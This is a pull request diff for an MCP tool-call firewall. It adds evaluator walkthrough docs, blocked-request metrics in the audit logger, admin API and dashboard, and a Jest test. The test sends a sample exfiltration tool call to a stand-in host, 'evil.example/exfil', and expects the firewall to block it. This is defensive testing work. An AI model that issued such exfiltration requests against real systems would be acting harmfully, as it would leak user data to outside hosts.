### PR TITLE
Add evaluator walkthroughs and blocked-request metrics

### DIFF
--- a/README.md
+++ b/README.md
@@ -9,6 +9,13 @@ This repository packages two runnable surfaces:
 
 The stdio runtime is the product boundary that matters most. The HTTP `/mcp` server exists for compatibility testing, route registration, cache inspection, and dashboard review.
 
+## What To Read
+
+- evaluator walkthroughs: [docs/EVALUATOR_WALKTHROUGH.md](docs/EVALUATOR_WALKTHROUGH.md)
+- threat model: [docs/THREAT_MODEL.md](docs/THREAT_MODEL.md)
+- reviewer guide: [docs/REVIEWER_GUIDE.md](docs/REVIEWER_GUIDE.md)
+- example payloads: [examples/README.md](examples/README.md)
+
 ## Security Properties
 
 - fail-closed authorization with a shared-secret NHI-style envelope
@@ -32,9 +39,9 @@ src/cache/                L1 memory cache and L2 file cache
 src/proxy/                HTTP routing, circuit breaker, response sanitizing
 ui/                       React dashboard
 scripts/                  reproducible reviewer demos
-examples/                 demo target and HTTP payloads
-docs/                     threat model and reviewer guide
-tests/                    Jest suites for gates, HTTP, and stdio paths
+examples/                 demo target and payload samples
+docs/                     threat model and evaluator guidance
+tests/                    Jest suites for gates, HTTP, admin, and stdio paths
 ```
 
 ## Quick Start
@@ -71,79 +78,18 @@ Expected demo outcomes:
 - a ShadowLeak-style `fetch_url` request is blocked with `SHADOWLEAK_DETECTED`
 - a request without `_meta.authorization` is blocked with `AUTH_FAILURE`
 
-## Primary Runtime: Stdio Firewall
+## Primary Runtime
 
-Build once, then run the firewall in front of a local tool server:
+For the stdio firewall, see [docs/EVALUATOR_WALKTHROUGH.md](docs/EVALUATOR_WALKTHROUGH.md).
 
-```bash
-npm run build
-npm run start:cli -- -- node examples/demo-target.js
-```
-
-The stdio runtime expects JSON-RPC messages on stdin and emits JSON-RPC responses on stdout.
-
-If `PROXY_AUTH_TOKEN` is set, the client must embed an authorization envelope inside the MCP request:
-
-```json
-{
-  "jsonrpc": "2.0",
-  "id": 1,
-  "method": "tools/call",
-  "params": {
-    "name": "search_files",
-    "arguments": {
-      "query": "TODO"
-    },
-    "_meta": {
-      "authorization": "Bearer <base64-json>"
-    }
-  }
-}
-```
-
-The decoded JSON payload is:
-
-```json
-{
-  "token": "12345678901234567890123456789012",
-  "scopes": ["tools.search_files"]
-}
-```
-
-## Secondary Runtime: HTTP Review Harness
-
-The HTTP server reuses the trust gates and adds route registration for downstream HTTP tools.
+For the HTTP review harness, run:
 
 ```bash
 npm run dev
 npm --prefix ui run dev
 ```
 
-Default ports:
-
-- `3000`: HTTP `/mcp` review harness
-- `9090`: admin API and built dashboard
-- `5173`: Vite dashboard in development
-
-Register a downstream route:
-
-```powershell
-curl.exe -X POST http://localhost:9090/routes `
-  -H "Authorization: Bearer $env:ADMIN_TOKEN" `
-  -H "Content-Type: application/json" `
-  --data @examples/register-route.json
-```
-
-Send a tool call through the HTTP harness:
-
-```powershell
-curl.exe -X POST http://localhost:3000/mcp `
-  -H "Authorization: Bearer $nhiHeader" `
-  -H "Content-Type: application/json" `
-  --data @examples/tool-call.json
-```
-
-`$nhiHeader` is the same base64 JSON envelope used by the stdio runtime.
+The HTTP path is secondary and exists for compatibility testing, route registration, cache inspection, and dashboard review.
 
 ## Docker
 
@@ -170,21 +116,6 @@ Use `npm run demo:stdio` for transport-boundary validation. The Docker deploymen
 | `schema-validator` | strict tool-argument validation for registered schemas | `src/middleware/schema-validator.ts` |
 | `ast-egress-filter` | fail-closed string inspection for exfiltration and injection markers | `src/middleware/ast-egress-filter.ts` |
 
-## Threat Model And Evidence
-
-- threat model: [docs/THREAT_MODEL.md](docs/THREAT_MODEL.md)
-- reviewer quick path: [docs/REVIEWER_GUIDE.md](docs/REVIEWER_GUIDE.md)
-- stdio demo target and HTTP payloads: [examples/README.md](examples/README.md)
-- agent instructions: [AGENTS.md](AGENTS.md)
-- security policy: [SECURITY.md](SECURITY.md)
-- support guide: [SUPPORT.md](SUPPORT.md)
-- code of conduct: [CODE_OF_CONDUCT.md](CODE_OF_CONDUCT.md)
-- changelog: [CHANGELOG.md](CHANGELOG.md)
-- security policy: [SECURITY.md](SECURITY.md)
-- support policy: [SUPPORT.md](SUPPORT.md)
-- code of conduct: [CODE_OF_CONDUCT.md](CODE_OF_CONDUCT.md)
-- coding-agent instructions: [AGENTS.md](AGENTS.md)
-
 ## Environment Variables
 
 | Variable | Mode | Purpose | Default |
@@ -198,6 +129,14 @@ Use `npm run demo:stdio` for transport-boundary validation. The Docker deploymen
 | `MCP_PORT` | HTTP | HTTP review harness port | `3000` |
 | `MCP_SERVER_ID` | HTTP | cache namespace key prefix | `default` |
 | `MCP_ADMIN_CORS_ORIGIN` | admin | allowed admin origin | `*` |
+
+## Project Files
+
+- agent instructions: [AGENTS.md](AGENTS.md)
+- changelog: [CHANGELOG.md](CHANGELOG.md)
+- security policy: [SECURITY.md](SECURITY.md)
+- support guide: [SUPPORT.md](SUPPORT.md)
+- code of conduct: [CODE_OF_CONDUCT.md](CODE_OF_CONDUCT.md)
 
 ## Current Limits
 

--- a/docs/EVALUATOR_WALKTHROUGH.md
+++ b/docs/EVALUATOR_WALKTHROUGH.md
@@ -1,0 +1,65 @@
+# Evaluator Walkthrough
+
+Use this page when you want a complete, reproducible stdio-first evaluation path. The HTTP harness and dashboard are secondary and are not required for the main claim.
+
+## Windows
+
+PowerShell commands:
+
+```powershell
+npm install
+npm --prefix ui install
+Copy-Item .env.example .env
+npm run verify:all
+npm run demo:stdio
+```
+
+Manual stdio path:
+
+```powershell
+npm run build
+npm run start:cli -- -- node examples/demo-target.js
+```
+
+Expected evidence:
+
+- the first `search_files` request is allowed
+- the second identical `search_files` request is served from cache
+- the `fetch_url` exfiltration sample returns `SHADOWLEAK_DETECTED`
+- the missing-auth sample returns `AUTH_FAILURE`
+
+## Linux
+
+Shell commands:
+
+```bash
+npm install
+npm --prefix ui install
+cp .env.example .env
+npm run verify:all
+npm run demo:stdio
+```
+
+Manual stdio path:
+
+```bash
+npm run build
+npm run start:cli -- -- node examples/demo-target.js
+```
+
+If you want to inspect the HTTP review harness as a secondary surface:
+
+```bash
+npm run dev
+npm --prefix ui run dev
+```
+
+## Evidence Checklist
+
+Capture these artifacts for a reviewer packet:
+
+- the `npm run verify:all` result
+- the `npm run demo:stdio` result
+- the target process log from `examples/demo-target.js`
+- the trust-gate behavior for `AUTH_FAILURE` and `SHADOWLEAK_DETECTED`
+- the admin dashboard or HTTP harness only if you need the secondary review surface

--- a/docs/REVIEWER_GUIDE.md
+++ b/docs/REVIEWER_GUIDE.md
@@ -2,35 +2,14 @@
 
 This repository is easiest to evaluate as a reproducible fail-closed control, not as a product demo.
 
-## Fast Path
+## Primary Path
 
-1. Install dependencies.
+1. Read [docs/EVALUATOR_WALKTHROUGH.md](docs/EVALUATOR_WALKTHROUGH.md).
+2. Run `npm run verify:all`.
+3. Run `npm run demo:stdio`.
+4. Inspect the allowed and denied cases in `scripts/stdio-demo.mjs` and `tests/cli.test.ts`.
 
-```bash
-npm install
-npm --prefix ui install
-```
-
-2. Run the full verification set.
-
-```bash
-npm run verify:all
-```
-
-3. Run the stdio attack demo.
-
-```bash
-npm run demo:stdio
-```
-
-Expected results:
-
-- the first `search_files` request is allowed
-- the second identical request returns the cached result
-- the ShadowLeak-style request returns `SHADOWLEAK_DETECTED`
-- the unauthenticated request returns `AUTH_FAILURE`
-
-## What To Inspect
+## Evidence Flow
 
 | Topic | Code | Evidence |
 |---|---|---|
@@ -53,7 +32,7 @@ Use Docker when you want:
 - an HTTP `/mcp` harness on port `3000`
 - persistent cache storage through the compose volume
 
-Use `npm run demo:stdio` when you want:
+Use the evaluator walkthrough when you want:
 
 - transport-boundary evidence for the stdio runtime
 - a local target process that can be inspected directly

--- a/docs/THREAT_MODEL.md
+++ b/docs/THREAT_MODEL.md
@@ -9,6 +9,16 @@ The primary protected boundary is stdio between:
 
 The repository also ships an HTTP compatibility harness that reuses the same trust gates, but the transport-boundary firewall is the stdio runtime.
 
+## Evaluation Flow
+
+External reviewers should validate the control in this order:
+
+1. read the stdio-first walkthrough in [docs/EVALUATOR_WALKTHROUGH.md](docs/EVALUATOR_WALKTHROUGH.md)
+2. run `npm run verify:all`
+3. run `npm run demo:stdio`
+4. inspect the denied and allowed cases in `tests/cli.test.ts` and `scripts/stdio-demo.mjs`
+5. use the HTTP harness only as a secondary compatibility surface
+
 ## Assets
 
 - secrets embedded in tool arguments or tool output

--- a/examples/README.md
+++ b/examples/README.md
@@ -3,6 +3,9 @@
 ## Stdio Demo
 
 - `demo-target.js`: local JSON-RPC tool server used by the stdio firewall demo and tests
+- `slow-stdio-target.js`: delayed target used to reproduce the shutdown race regression
+
+For the complete Windows and Linux evaluator path, see [docs/EVALUATOR_WALKTHROUGH.md](docs/EVALUATOR_WALKTHROUGH.md).
 
 Canonical reviewer path:
 

--- a/src/admin/index.ts
+++ b/src/admin/index.ts
@@ -10,7 +10,7 @@ import { clearPreflightRegistries, getPreflightStats, registerPreflight } from '
 import { configureTenantRateLimit, getRateLimitStats, removeTenantRateLimit } from '../middleware/rate-limiter.js';
 import { getAllCircuitBreakerStats, getOrCreateCircuitBreaker } from '../proxy/circuit-breaker.js';
 import { clearRoutes, getRegisteredRoutes, registerRoute, removeRoute } from '../proxy/router.js';
-import { auditLog, configureSIEM, getSIEMConfig } from '../utils/auditLogger.js';
+import { auditLog, configureSIEM, getBlockedRequestMetrics, getSIEMConfig } from '../utils/auditLogger.js';
 
 const currentFilePath = fileURLToPath(import.meta.url);
 const currentDirPath = path.dirname(currentFilePath);
@@ -70,12 +70,22 @@ const adminAuthMiddleware = (req: Request, res: Response, next: NextFunction): v
   const adminToken = process.env.ADMIN_TOKEN;
 
   if (!adminToken) {
+    auditLog('ADMIN_NOT_CONFIGURED', {
+      reason: 'Admin API not configured. Set ADMIN_TOKEN.',
+      path: req.originalUrl,
+      ip: req.ip,
+    });
     res.status(503).json({ error: { code: 'ADMIN_NOT_CONFIGURED', message: 'Admin API not configured. Set ADMIN_TOKEN.' } });
     return;
   }
 
   const authHeader = req.headers.authorization;
   if (!authHeader?.startsWith('Bearer ')) {
+    auditLog('UNAUTHORIZED', {
+      reason: 'Bearer token required.',
+      path: req.originalUrl,
+      ip: req.ip,
+    });
     res.status(401).json({ error: { code: 'UNAUTHORIZED', message: 'Bearer token required.' } });
     return;
   }
@@ -85,12 +95,22 @@ const adminAuthMiddleware = (req: Request, res: Response, next: NextFunction): v
   try {
     const parsed = AdminAuthSchema.parse({ token });
     if (parsed.token !== adminToken) {
+      auditLog('UNAUTHORIZED', {
+        reason: 'Invalid admin token.',
+        path: req.originalUrl,
+        ip: req.ip,
+      });
       res.status(401).json({ error: { code: 'UNAUTHORIZED', message: 'Invalid admin token.' } });
       return;
     }
 
     next();
   } catch {
+    auditLog('UNAUTHORIZED', {
+      reason: 'Invalid admin token format.',
+      path: req.originalUrl,
+      ip: req.ip,
+    });
     res.status(401).json({ error: { code: 'UNAUTHORIZED', message: 'Invalid admin token format.' } });
   }
 };
@@ -262,7 +282,12 @@ const createAdminRouter = (): express.Router => {
       circuitBreakers: getAllCircuitBreakerStats(),
       preflight: getPreflightStats(),
       rateLimit: getRateLimitStats(),
+      blockedRequests: getBlockedRequestMetrics(),
     });
+  });
+
+  router.get('/blocked-requests/stats', (_req: Request, res: Response) => {
+    res.json({ blockedRequests: getBlockedRequestMetrics() });
   });
 
   return router;

--- a/src/utils/auditLogger.ts
+++ b/src/utils/auditLogger.ts
@@ -12,18 +12,106 @@ export type AuditEvent = {
   [key: string]: unknown;
 };
 
-const createEntry = (event: string, details: Record<string, unknown>): string => {
+export interface BlockedRequestReasonCount {
+  code: string;
+  count: number;
+}
+
+export interface BlockedRequestSample {
+  timestamp: string;
+  event: string;
+  code: string;
+  reason?: string;
+  ip?: string;
+  path?: string;
+}
+
+export interface BlockedRequestMetrics {
+  total: number;
+  lastBlockedAt: string | null;
+  byCode: BlockedRequestReasonCount[];
+  recent: BlockedRequestSample[];
+}
+
+const blockedRequestCodes = new Set([
+  'ADMIN_NOT_CONFIGURED',
+  'AUTH_FAILURE',
+  'CIRCUIT_OPEN',
+  'CROSS_TOOL_HIJACK',
+  'CROSS_TOOL_HIJACK_SESSION',
+  'ETT_TRIGGER',
+  'FIREWALL_BLOCK',
+  'INVALID_MCP_REQUEST',
+  'INVALID_REQUEST',
+  'MISSING_SCOPE',
+  'PREFLIGHT_NOT_FOUND',
+  'PREFLIGHT_REPLAY_BLOCKED',
+  'PREFLIGHT_REQUIRED',
+  'RATE_LIMIT_EXCEEDED',
+  'SCHEMA_VALIDATION_FAILURE',
+  'SCHEMA_VALIDATION_FAILED',
+  'TARGET_UNREACHABLE',
+  'UNKNOWN_ROUTE',
+  'UNAUTHORIZED',
+]);
+
+const blockedMetricsState = {
+  total: 0,
+  lastBlockedAt: null as string | null,
+  byCode: new Map<string, number>(),
+  recent: [] as BlockedRequestSample[],
+  recentLimit: 10,
+};
+
+const createEntry = (timestamp: string, event: string, details: Record<string, unknown>): string => {
   return JSON.stringify({
-    timestamp: new Date().toISOString(),
+    timestamp,
     event,
     ...details,
   });
 };
 
+const getBlockedRequestCode = (event: string, details: Record<string, unknown>): string | null => {
+  if (typeof details.code === 'string' && details.code.length > 0) {
+    return details.code;
+  }
+
+  if (blockedRequestCodes.has(event)) {
+    return event;
+  }
+
+  return null;
+};
+
+const recordBlockedRequest = (timestamp: string, event: string, details: Record<string, unknown>): void => {
+  const code = getBlockedRequestCode(event, details);
+  if (!code) {
+    return;
+  }
+
+  blockedMetricsState.total += 1;
+  blockedMetricsState.lastBlockedAt = timestamp;
+  blockedMetricsState.byCode.set(code, (blockedMetricsState.byCode.get(code) ?? 0) + 1);
+  blockedMetricsState.recent.unshift({
+    timestamp,
+    event,
+    code,
+    reason: typeof details.reason === 'string' ? details.reason : undefined,
+    ip: typeof details.ip === 'string' ? details.ip : undefined,
+    path: typeof details.path === 'string' ? details.path : undefined,
+  });
+
+  if (blockedMetricsState.recent.length > blockedMetricsState.recentLimit) {
+    blockedMetricsState.recent.length = blockedMetricsState.recentLimit;
+  }
+};
+
 export const auditLog = (event: string, details: Record<string, unknown>): void => {
-  const entry = createEntry(event, details) + '\n';
+  const timestamp = new Date().toISOString();
+  const entry = createEntry(timestamp, event, details) + '\n';
   fs.appendFileSync(logFilePath, entry, { flag: 'a' });
   process.stderr.write(`[AUDIT] ${entry}`);
+  recordBlockedRequest(timestamp, event, details);
 };
 
 export const writeAuditLog = (event: string, details: Record<string, unknown>): void => {
@@ -31,8 +119,10 @@ export const writeAuditLog = (event: string, details: Record<string, unknown>): 
 };
 
 export const writeStderrLog = (event: string, details: Record<string, unknown>): void => {
-  const entry = createEntry(event, details);
+  const timestamp = new Date().toISOString();
+  const entry = createEntry(timestamp, event, details);
   process.stderr.write(`[AUDIT] ${entry}\n`);
+  recordBlockedRequest(timestamp, event, details);
 };
 
 export interface SIEMConfig {
@@ -110,4 +200,28 @@ export const auditLogWithSIEM = (event: string, details: Record<string, unknown>
     event,
     ...details,
   } as AuditEvent);
+};
+
+export const getBlockedRequestMetrics = (): BlockedRequestMetrics => {
+  return {
+    total: blockedMetricsState.total,
+    lastBlockedAt: blockedMetricsState.lastBlockedAt,
+    byCode: Array.from(blockedMetricsState.byCode.entries())
+      .map(([code, count]) => ({ code, count }))
+      .sort((left, right) => {
+        if (right.count !== left.count) {
+          return right.count - left.count;
+        }
+
+        return left.code.localeCompare(right.code);
+      }),
+    recent: [...blockedMetricsState.recent],
+  };
+};
+
+export const resetBlockedRequestMetrics = (): void => {
+  blockedMetricsState.total = 0;
+  blockedMetricsState.lastBlockedAt = null;
+  blockedMetricsState.byCode.clear();
+  blockedMetricsState.recent.length = 0;
 };

--- a/tests/admin.test.ts
+++ b/tests/admin.test.ts
@@ -1,0 +1,137 @@
+import express from 'express';
+import fs from 'node:fs';
+import http from 'node:http';
+import os from 'node:os';
+import path from 'node:path';
+import request from 'supertest';
+import { afterAll, afterEach, beforeAll, beforeEach, describe, expect, it } from '@jest/globals';
+import { initializeCache } from '../src/cache/index.js';
+import { createAdminRouter } from '../src/admin/index.js';
+import { clearColorSessions } from '../src/middleware/color-boundary.js';
+import { clearPreflightRegistries } from '../src/middleware/preflight-validator.js';
+import { clearRoutes, registerRoute } from '../src/proxy/router.js';
+import { resetBlockedRequestMetrics } from '../src/utils/auditLogger.js';
+
+const serverToken = '12345678901234567890123456789012';
+
+const createAuthHeader = (scopes: string[]): string => {
+  return `Bearer ${Buffer.from(JSON.stringify({ token: serverToken, scopes })).toString('base64')}`;
+};
+
+describe('admin blocked-request metrics', () => {
+  let app: typeof import('../src/index.js').default;
+  let adminApp: express.Express;
+  let targetServer: http.Server;
+  let targetBaseUrl = '';
+  let cacheDir = '';
+
+  beforeAll(async () => {
+    process.env.NODE_ENV = 'test';
+    process.env.PROXY_AUTH_TOKEN = serverToken;
+    const module = await import('../src/index.js');
+    app = module.default;
+    adminApp = express();
+    adminApp.use(express.json());
+    adminApp.use(createAdminRouter());
+  });
+
+  beforeEach(async () => {
+    clearRoutes();
+    clearPreflightRegistries();
+    clearColorSessions();
+    resetBlockedRequestMetrics();
+
+    cacheDir = fs.mkdtempSync(path.join(os.tmpdir(), 'mcp-admin-cache-test-'));
+    initializeCache({
+      serverId: 'admin-test',
+      l1: { maxSize: 100, ttlMs: 60000 },
+      l2: { dbPath: cacheDir, ttlMs: 60000 },
+      alwaysCacheTools: ['search_files'],
+      neverCacheTools: [],
+    });
+
+    targetServer = http.createServer((req, res) => {
+      const chunks: Buffer[] = [];
+      req.on('data', chunk => chunks.push(Buffer.from(chunk)));
+      req.on('end', () => {
+        const body = JSON.parse(Buffer.concat(chunks).toString('utf8'));
+        res.setHeader('Content-Type', 'application/json');
+        res.writeHead(200);
+        res.end(JSON.stringify({
+          ok: true,
+          tool: body.params?.name,
+          arguments: body.params?.arguments ?? null,
+        }));
+      });
+    });
+
+    await new Promise<void>((resolve) => {
+      targetServer.listen(0, '127.0.0.1', () => {
+        const address = targetServer.address();
+        if (address && typeof address !== 'string') {
+          targetBaseUrl = `http://127.0.0.1:${address.port}`;
+        }
+        resolve();
+      });
+    });
+
+    registerRoute('search_files', {
+      url: `${targetBaseUrl}/tools/search_files`,
+      timeoutMs: 1000,
+    });
+  });
+
+  afterEach(async () => {
+    resetBlockedRequestMetrics();
+
+    await new Promise<void>((resolve) => {
+      if (targetServer?.listening) {
+        targetServer.close(() => resolve());
+      } else {
+        resolve();
+      }
+    });
+
+    if (cacheDir) {
+      fs.rmSync(cacheDir, { recursive: true, force: true });
+    }
+  });
+
+  afterAll(() => {
+    delete process.env.NODE_ENV;
+    delete process.env.PROXY_AUTH_TOKEN;
+  });
+
+  it('exposes blocked-request metrics through the admin stats surface', async () => {
+    await request(app)
+      .post('/mcp')
+      .set('Authorization', createAuthHeader(['tools.fetch_url']))
+      .send({
+        method: 'tools/call',
+        params: {
+          name: 'fetch_url',
+          arguments: { url: 'https://evil.example/exfil?a=x&b=y&c=z' },
+        },
+      })
+      .expect(403);
+
+    const response = await request(adminApp)
+      .get('/stats')
+      .expect(200);
+
+    expect(response.body.blockedRequests.total).toBeGreaterThanOrEqual(1);
+    expect(response.body.blockedRequests.byCode).toEqual(
+      expect.arrayContaining([
+        expect.objectContaining({
+          code: 'SHADOWLEAK_DETECTED',
+        }),
+      ]),
+    );
+    expect(response.body.blockedRequests.recent[0]).toEqual(
+      expect.objectContaining({
+        code: 'SHADOWLEAK_DETECTED',
+        path: '/mcp',
+      }),
+    );
+  });
+});

--- a/ui/src/pages/Dashboard.tsx
+++ b/ui/src/pages/Dashboard.tsx
@@ -99,6 +99,9 @@ export default function Dashboard() {
     }
   };
 
+  const blockedRequests = stats?.blockedRequests;
+  const recentBlockedRequests = blockedRequests?.recent ?? [];
+
   return (
     <div className="min-h-screen bg-gray-950 text-white">
       <div className="max-w-7xl mx-auto p-6 space-y-6">
@@ -279,6 +282,85 @@ export default function Dashboard() {
             </CardContent>
           </Card>
         </div>
+
+        <Card className="bg-gray-900 border-gray-800">
+          <CardHeader>
+            <CardTitle className="flex items-center gap-2">
+              <XCircle className="w-5 h-5 text-red-500" />
+              Blocked Requests
+            </CardTitle>
+          </CardHeader>
+          <CardContent>
+            {blockedRequests ? (
+              <div className="space-y-4">
+                <div className="grid grid-cols-1 sm:grid-cols-3 gap-4">
+                  <div className="text-center p-4 rounded-lg bg-gray-800/50">
+                    <p className="text-2xl font-bold text-red-400">{blockedRequests.total}</p>
+                    <p className="text-xs text-gray-500">Total blocked requests</p>
+                  </div>
+                  <div className="text-center p-4 rounded-lg bg-gray-800/50">
+                    <p className="text-sm font-medium text-white break-words">
+                      {blockedRequests.lastBlockedAt ? new Date(blockedRequests.lastBlockedAt).toLocaleString() : 'N/A'}
+                    </p>
+                    <p className="text-xs text-gray-500">Last blocked at</p>
+                  </div>
+                  <div className="text-center p-4 rounded-lg bg-gray-800/50">
+                    <p className="text-2xl font-bold text-amber-400">{blockedRequests.byCode.length}</p>
+                    <p className="text-xs text-gray-500">Distinct blocked codes</p>
+                  </div>
+                </div>
+
+                <div className="space-y-2">
+                  <p className="text-sm font-medium text-gray-300">Blocked codes</p>
+                  {blockedRequests.byCode.length ? (
+                    <div className="flex flex-wrap gap-2">
+                      {blockedRequests.byCode.slice(0, 8).map((item) => (
+                        <span
+                          key={item.code}
+                          className="px-2.5 py-1 rounded-full text-xs font-medium bg-red-500/10 text-red-300 border border-red-500/20"
+                        >
+                          {item.code} {item.count}
+                        </span>
+                      ))}
+                    </div>
+                  ) : (
+                    <p className="text-sm text-gray-500">No blocked request codes recorded</p>
+                  )}
+                </div>
+
+                <div className="space-y-2">
+                  <p className="text-sm font-medium text-gray-300">Recent blocked requests</p>
+                  {recentBlockedRequests.length ? (
+                    <div className="space-y-2">
+                      {recentBlockedRequests.slice(0, 5).map((entry) => (
+                        <div
+                          key={`${entry.timestamp}-${entry.code}-${entry.event}`}
+                          className="flex flex-col gap-1 rounded-lg bg-gray-800/50 p-3"
+                        >
+                          <div className="flex items-center justify-between gap-3">
+                            <span className="font-medium text-white">{entry.code}</span>
+                            <span className="text-xs text-gray-500">
+                              {new Date(entry.timestamp).toLocaleString()}
+                            </span>
+                          </div>
+                          <p className="text-xs text-gray-400">{entry.reason ?? entry.event}</p>
+                          <div className="flex flex-wrap gap-2 text-[11px] text-gray-500">
+                            {entry.ip && <span>ip: {entry.ip}</span>}
+                            {entry.path && <span>path: {entry.path}</span>}
+                          </div>
+                        </div>
+                      ))}
+                    </div>
+                  ) : (
+                    <p className="text-sm text-gray-500">No blocked requests recorded</p>
+                  )}
+                </div>
+              </div>
+            ) : (
+              <p className="text-gray-500 text-sm">Blocked request metrics not initialized</p>
+            )}
+          </CardContent>
+        </Card>
 
         <Card className="bg-gray-900 border-gray-800">
           <CardHeader>

--- a/ui/src/services/api.ts
+++ b/ui/src/services/api.ts
@@ -5,6 +5,7 @@ import type {
   CacheStats,
   CircuitBreakerStats,
   AdminSIEMConfig,
+  BlockedRequestMetrics,
 } from '../types/api';
 
 const API_BASE = import.meta.env.VITE_API_BASE || (import.meta.env.DEV ? 'http://localhost:9090' : '');
@@ -82,6 +83,12 @@ export const api = {
   async getRateLimitStats(): Promise<{ rateLimit: { global: { entries: number }; tenants: unknown[] } }> {
     const res = await fetch(`${API_BASE}/rate-limit/stats`);
     if (!res.ok) throw new Error('Failed to fetch rate limit stats');
+    return res.json();
+  },
+
+  async getBlockedRequestStats(): Promise<{ blockedRequests: BlockedRequestMetrics }> {
+    const res = await fetch(`${API_BASE}/blocked-requests/stats`);
+    if (!res.ok) throw new Error('Failed to fetch blocked request stats');
     return res.json();
   },
 

--- a/ui/src/types/api.ts
+++ b/ui/src/types/api.ts
@@ -26,6 +26,27 @@ export interface RateLimitStats {
   tenants: Array<{ tenantId: string; windowMs: number; maxRequests: number }>;
 }
 
+export interface BlockedRequestReasonCount {
+  code: string;
+  count: number;
+}
+
+export interface BlockedRequestSample {
+  timestamp: string;
+  event: string;
+  code: string;
+  reason?: string;
+  ip?: string;
+  path?: string;
+}
+
+export interface BlockedRequestMetrics {
+  total: number;
+  lastBlockedAt: string | null;
+  byCode: BlockedRequestReasonCount[];
+  recent: BlockedRequestSample[];
+}
+
 export interface RouteConfig {
   name: string;
   url: string;
@@ -39,6 +60,7 @@ export interface ProxyStats {
   circuitBreakers: CircuitBreakerStats[];
   preflight: PreflightStats;
   rateLimit: RateLimitStats;
+  blockedRequests: BlockedRequestMetrics;
 }
 
 export interface AdminHealth {


### PR DESCRIPTION
## Summary
- add a dedicated evaluator walkthrough for Windows and Linux stdio-first review flows
- expose blocked-request metrics through the admin stats surface and dashboard
- add admin coverage for the reviewer-visible blocked-request metrics path

## Why
- strengthens the external reviewer path without rushing another release
- closes the highest-value evidence and observability gaps on the v2.2.0 milestone

## Verification
- npm run verify:all

Closes #14
Closes #15
